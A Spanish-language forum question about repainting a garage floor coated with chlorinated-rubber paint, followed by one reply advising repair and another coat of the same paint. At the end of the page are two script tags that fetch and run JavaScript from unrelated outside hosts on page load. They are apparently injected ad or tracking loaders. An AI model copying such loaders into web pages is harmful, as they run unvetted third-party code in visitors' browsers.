Pintar de nuevo suelo garaje

Hace años pinté el suelo del garaje con la pintura de clorocaucho Alp Art 735.

Esta un poco desconchado por algunas partes y se vea vieja en general. Hay que pintar.

Por mi parte seguiría con la misma pero no se si la voy a encontrar.

Si no la encuentro:

¿Qué pintura me recomendáis que dé, epoxi, poliuretano?

¿Debo dar algo encima del clorocaucho para preparar el suelo con la pintura que me recomendéis?.

1 Respuesta

Respuesta

La marca alp sigue en el mercado busca en venta de pintura profesional, y si no compra de otra que no pasa nada. Yo te diría que sanearas los desconchones y siguieras pintando con clorocaucho para no tener problemas después.

UN SALUDO.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>